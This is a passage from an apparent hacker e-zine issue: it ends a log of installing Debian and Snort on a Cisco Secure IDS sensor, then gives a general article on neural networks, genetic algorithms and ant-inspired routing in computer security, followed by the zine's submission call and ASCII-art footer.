I will note that this particular machine, I have seen before in my last job,
where we deployed 1500 Linux machines... If this is the particular revision
of the Intel 1U... it is prone to heat problems.
Posting... again. Take a smoke break or something.
So back to the Debian screen, I will install a base system of Debian quickly..
It's no big deal, as I always run SID, so this stuff will be upgraded via
the network... just to let you know, I am using the bf24 kernel option of the
Debian 3.0 install ISO. I am of course, doing the standard base install, but
I am repartitioning, and I will be installing the ext3 filesystem. I have just
written my partition table to disk... and now I am initializing.
The drive initialization is complete... No problems whatsoever. The longest
part of this process when it comes to drive init is the journal creation. I am
very impatient at this point, as its close to time to go home.
My first set of drivers are coming from the CD... I fully plan to deploy this
machine into production with a 2.4.25 kernel that will have some trickery
included. The main thing I am worried about grabbing is the eepro driver, which
is very old and supported. I have selected that, and I will configure my
network settings via my personal own DHCP server... I have a nice little
test environment here in my cube, so this won't be a problem.
DHCP of course works, and life is peachy. I am installing the base system now,
and preparing to go home. I will leave this article off on a good note, one
where we have successfully booted Debian off a Cisco Secure IDS sensor. There
is absolutely NO TRICK to this, because like I said before, this is a x86
machine. I find it amusing though, because I absolutely _HATE_ Cisco Secure IDS.
I have made the system bootable, installed my MBR on /dev/hda and now I am
rebooting. It is of course, going to take another good time to POST. In this
time I have packed up my very pimplike Gateway M675 laptop, and gathered up
my odds and ends. Posting...
Wasn't there some kind of major flaw with the 440BX's? I don't know... Its
posting. The Lilo prompt has appeared and now its booting the stock bf24
kernel. Now I will configure the base system, and prepare it to take my
specific package loadout, and of course, my "special sauce". Tomorrow, I will
have a functioning Debian box running Snort, created from a Cisco Secure IDS
model 4210. It will report back to a custom backend, and tell me everything
I need to know about YOU!
It's been fun, remember, when the man has you down, replace him with a small
shell script. Peace.
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[Artificial InfoSex]-------------------------------------[datacide@inet-sec.org]
--------------------------------------------------------------------------------
Articial Intelligence in InfoSec
by datacide@inet-sec.org
www.inet-sec.org #inet-sec@ircs
For most people, Artificial Intelligence (from now on referred to AI in the scope of this article)
is a term more related to Science Fiction and Academic circles than to Information Security.
It's a common misconception that AI is nothing but Sci-Fi or a collection of useless experiments.
One cause of this misinterpretation is that AI is divided into two major subfields
(which in turn again are divided...etc etc, you get the picture),
Strong AI and Weak AI, and also the fact that people automatically imagine AI to mean a fully sentient,
self-aware entity.
Strong AI is the development of "true" artificial intelligence, self-aware, sentient entities that can truly
solve problems. Fact is, we are years (and with years, I mean decades, if not centuries) away from achieving
this objective (if at all. Roger Penrose, a Physicist and Mathematician claims in his bestselling book
"The emperors new mind" that it is in fact impossible, on the other side of the spectrum we have Ray Kurzweil,
who in his book "The age of spiritual machines" claims we will have a fully sentient virtual being within
25-50 years) and current and past research into this field has been rather disappointing.
Weak AI has set itself slightly lower targets, namely to create methods that seem semi-intelligent and solve
specific problems.
In recent times, the term AI has been applied to techniques learned by trying to create AI and/or modelled
after biological processes.
This includes such fields as neural networks, MBL (machine-based learning), GA's (genetic algorithms)
and markov models to name a few.
I presume alot of readers are still wondering what the hell this has to do with InfoSec, right?
Well, we'll get to that now. Instead of explaining the history and current state of AI in general,
I am going to provide a brief overview of current AI-related applications in the field of computer security.
After this, you should begin to realize how the future of AI and InfoSec will merge and become intertwined.
The future of security
Neural Networks and Machine based learning (MBL)
Alot of companies are curently working on next-generation IDS's based on various AI models.
Gone are the times of fingerprinting network traffic based on signatures. These methods have shown themselves
to be primitive, unreliable (too many false positives for one) and difficult to manage.
Adaptive technologies are needed and several companies and think tanks have started to work in this field.
Neural networks (henceforth called NN's) are a simplified model of our own wetware neurons.
In essence, a number of inputs are used to gather information. After assessing all input, output is generated,
usually in the form of boolean TRUE or FALSE. Neural Networks are rather dumb without training (in fact,
their assessment is pretty much random), so they need to be trained.
This is done using a "weights" scheme, basically telling the NN which of it's results seem to be correct
and which ones are incorrect.
NN's have proven themselves effective in a variety of situations, mainly in areas of pattern recognition and fuzzy logic.
In normal IDS/Content filtering schemes, signatures are used. This method is very unreliable, unscalable, is prone
to alot of false positives and also pretty much static providing little in the way of adaptability.
NN's on the other hand "model" behaviour and use pattern recognition, allowing for a flexible, adaptive approach.
One example is a user-monitoring agent which models users behaviour over a time period. Once it is trained,
it can be implemented to monitor users behaviour, and if what the NN deems as normal behaviour deviates from the norm,
it can be used to react as defined by a custom rule set.
A number of papers have been published on this type of application:
http://www.cs.rpi.edu/~brancj/publications/ryan98intrusion.pdf
In fact, googling for the terms displays a massive array of hits:
http://www.google.com/search?hl=en&ie=UTF-8&q=neural+networks+intrusion+detection&btnG=Google+Search
The same applies to network traffic. Instead of a signature based approach, "normal" network activity can be
fed into the NN and then monitored, once again for deviation from what the NN believes to be "normal" network traffic.
One company currently working on this approach (and actually to market an NN based IDS product are Imagination Engines
(http://www.imagination-engines.com/applications/ids.htm). Industry BigNames such as Cisco, ISS, Stonegate and almost
any corporation involved in Networking/Security are actively involved in this sort of research.
Another area that has shown interest in NN's for pattern recognition is Image/Content filtering.
There are a number of NN based solutions already commercially available, F4i Image recognition
(from first4internet.co.u) is an application have first hand experience with. It scans images in emails
for pornographic content. It is amazingly precise and has a very low false-positive rate ( > 1% ).
Other applications are antivirus/anti-malware and email/web traffic content filtering (www.surfcontrol.com
uses a NN approach for example).
NNs have also become very important in the fight against the tidal wave of spam we are now receiving.
A recent article on www.generation5.org (generation5 refers to the current generation of AI), which was also featured
on SlashDot even included sample code (albeit in C#.....) (http://www.generation5.org/content/2004/KillSpam.asp)
and googling for related whitepapers once again gives you years of reading material.
Biometrics also make extensive use of NN's, especially their ability for pattern recognition and the creation
of modelled maps. Fingerprint ID, Face ID and Voice recog. systems often use NN's for the actual identification process,
as these, as mentioned before, have an uncanny ability to recognize patterns instead of static attributes.
This helps in cases where some features might slightly change due to external circumstances,
for example holding the finger slightly off-angle, or having a swollen cheek due to toothache.
I have on associate who is working on a NN based project which learns the rhythm with which users type their passwords.
It works a treat, has an accuracy of 93% and isnt even fully developed.
The main abilities of NN's, Pattern recognition, also make it interesting for another real-world application,
namely data-mining. With the vast amount of information available from various sources
(including other NN based approaches such as NN based IDS's) there is also a need to evaluate said data.
Even here, AI related methods are showing vast potential (and are used in practical applications in many cases).
Data mining based on bayes, markov models, NNs and other MBL based approaches are beginning to help keep the GBs
of data manageable.
Genetic algorithms are also helping to form the security applications of the future. GAs, as the name implies,
use methods based on evolution to generate the best approaches to solve problems. Lets say you are looking for
the best solution to solve a problem. You whack 20000 random programs into a virtual test-tube (i.e., computer memory),
define certain criteria these have to achieve, and let it run.
The _fittest_ programs (i.e. the ones closest to achieving the set goals) are then taken,
multiplied to 20000 again, this time, some of these are _bred_ with one another.
This means that certain parts are exchanged (like when the sperm and egg cell are combined, genes are taken from both)
and a bit of random mutation is added. This is repeated for several thousand generations until (hopefully)
the best solution to the problem evolves.
There are numerous think tanks working on using this approach, as it can be applied to many problems.
The actual results (i.e. the problem solved, which can range from recognizing intrusions, to encryption)
are impressive, but the process also creates another factor that needs consideration from a security point of view.
Auditing code which was generated this way can be quite daunting. Remember, it wasnt generated per se by a
human programmer, but evolved according to quite lose criteria. The resulting source can seem illogical and confusing.
Although this means that an attacker has a harder time finding bugs, the same can be said of security auditors.
Thankfully, the same methods can be applied to try and break the code as well,
i.e. stress and penetration testing of computer generated code by computer generated code.
Last but not least, we will mention Artificial Life. This is another related discipline to AI, one that doesnt strive to create intelligence as such, but rather alive seeming agents. Most are modelled on living organisms, one reason for the fields name.
Now you might (Still? - Ed.)be scratching your head and wondering _what the hell does that have to do with _InfoSec_,
and once again, I will open your eyes.
One real-world application is the use of a process modelled after Ants.
You heard right, Ants (Not Antz - Ed.). The application is Network Routing.
Ants are very dumb (compared to what? - Ed.), in fact, an individual Ant only has a few responses to any given situation.
Ants also possess only local knowledge. Despite popular belief, an Ant Queen isnt any smarter,
It just lays eggs. But through some form of natural magic, ants are doing incredibly well.
For Network specialists, three aspects of ant behaviour are interesting (reproducing,reproducing,reproducing - Ed.).
The fact that they always find the shortest route to a food source collectively,
the fact that ants dont have traffic jams and the way in which ant nests regulate what each worker does.
Both are related to pheromone usage and local observation.
If an ant nest finds a source of food, a lot of worker ants are put to work to harvest this food.
Every time an ant walks down a path, it leaves a pheromone trail which slowly gets weaker and weaker.
Ants tend to follow the strongest trail, so the shortest path will have the strongest residue.
After a while, all ants use that path. Its a beautiful example of how nature regulates certain processes
without a central control unit.
Resource management is also done via a simple method. As an ant has no means of global communication,
it can act only on local impulses. If an ant goes out of the nest and sees 7 other ants gathering food,
and 3 tending to larvae, it will join the larvae tending ants.
It basically assumes that it should be doing that due to what it has observed.
The pheromone system also adds another interesting factor, especially for the security side of things.
Ants of the same colony recognize each other by the pheromones they produce. This system is being researched
to mark network internal packet traffic.
Having to hack your way through semi-autonomous agents, marked with system internal IDs that react dynamically
to intrusions, based on computer generated code will change the face of computer security.
The implications for network routing, and network management should be plain to see, so plain in fact,
that it is a very common research topic
(http://mars.elcom.nitech.ac.jp/~matsuo/SNPD01-2.pdf
http://dsp.jpl.nasa.gov/members/payman/swarm/bonabeau98-iata.pdf (NASA)
http://www.businessweek.com/1997/25/b353218.htm (british telecom)
http://portal.acm.org/citation.cfm?id=993020&dl=ACM&coll=portal&CFID=11111111&CFTOKEN=2222222 (cisco)
)
Modelling natural biological behaviour is a perfect method of solving common problems.
Mother nature has had millions of years to perfect its creatures, and has come up with diverse
and varied effective strategies to overcome many problems.
Other natural behaviours are also being studied, Predator/Prey behaviour,
Bird Flocking behaviour, the list goes on and on. Because most of these behaviours derive from very simple rules,
and arent controlled centrally or organised, they are referred to as _bottom up_
approaches and belong to the discipline of emergence. Remember that term, emergence.
It will play a big role in the future, especially of networks.
I hope this article has given a broad overview of what the future holds, and why anyone interested in Computer
Security should be interested in the field of Artificial Intelligence/Life.
We will have to take notice of all this soon anyway, the contact with these methods unavoidable,
and it is always better to be prepared.
Links:
www.ai-depot.com
www.generation5.org
www.cs.washington.edu/ai/
www.ai.mit.edu
http://yaraslov.hopto.org/ai
www.cognews.com
http://planning.jpl.nasa.gov
Books:
Ray Kurzweil, The age of spiritual machines
Roger Penrose, The emperors new mind
Deborah Gordon, Ants at work
Stephen Johnson, Emergence, the connected lives of Ants, Brains, Cities and Software
Stuart .J.Russel, Artificial Intelligence, A modern Approach
Kevin Gurney, Introduction to Neural Networks
Steven Levy, Artificial Life
Mark Ward, Virtual Organisms
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
S U B M I T T O K E E N V E R A C I T Y
--------------------------------------------------------------------------------
NO! You do not have to be a member of Legions of the Underground to submit to
KV. You can be a member of something else! Nobody is perfect (with the exception
of the editor ofcourse - A.)! If you have a idea and would like to toss it out
in the wind for general discussion, or maybe you are researching something and
you just want feedback, KV is a great way to get your ideas out in the open.
We at Legions of the Underground are not prejudice in any way shape or form,
so even a AOLer's article may be published (_MAY_ not _WILL_ - A.) if it seems
that it has clue. Or then again, maybe hell will freeze over! Anyones stuff
maybe published, but we will never know if you don't submit! So get to writing.
Because what you don't know can kill you! Legions of the Underground is a
equal opportunity destroyer (of systems and great walls alike).
--------------------------------------------------------------------------------
All submissions to: submit-kv@legions.org
--------------------------------------------------------------------------------
IRC: Undernet #legions
MUD: Sensenet.legions.org 5555 - The Best in Star Wars Reality Mudding
--------------------------------------------------------------------------------
O F T E N I M I T A T E D N E V E R D U P L I C A T E D
--------------------------------------------------------------------------------
L E G I O N S O F T H E U N D E R G R O U N D
n :.
E% ___ _______ ___ ___ :"5
z % | | (_______) | | | | :" `
K ": | | | | | | | | | | z R
? %. | | | | | | | | | | :^ J
". ^s | |___ | |___| | | |___| | f :~
'+. #L |_____|[] \_____/[] \_____/[] z" .*
'+ %L z" .~
": '%. .# +
": ^%. .#` +"
#: "n .+` .z"
#: ": www.legions.org z` +"
%: `*L z" z"
*: ^*L z* .+"
"s ^*L z# .*"
#s ^%L z# .*"
#s ^%L z# .r"
#s ^%. u# .r"
#i '%. u# .@"
#s ^%u# .@"
#s x# .*"
x#` .@%.
x#` .d" "%.
xf~ .r" #s "%.
u x*` .r" #s "%. x.
%Mu*` x*" #m. "%zX"
:R(h x* "h..*dN.
u@NM5e#> 7?dMRMh.
z$@M@$#"#" *""*@MM$hL
u@@MM8* "*$M@Mh.
z$RRM8F" [knowledge is key] "N8@M$bL
5`RM$# 'R88f)R
'h.$" #$x*
--------------------------------------------------------------------------------
All mention of LoU, Legions of the Underground, Legions, KV, or Keen Veracity,
copyright (c) 2000-2004 legions.org, all human rights reserved outside the US.
--------------------------------------------------------------------------------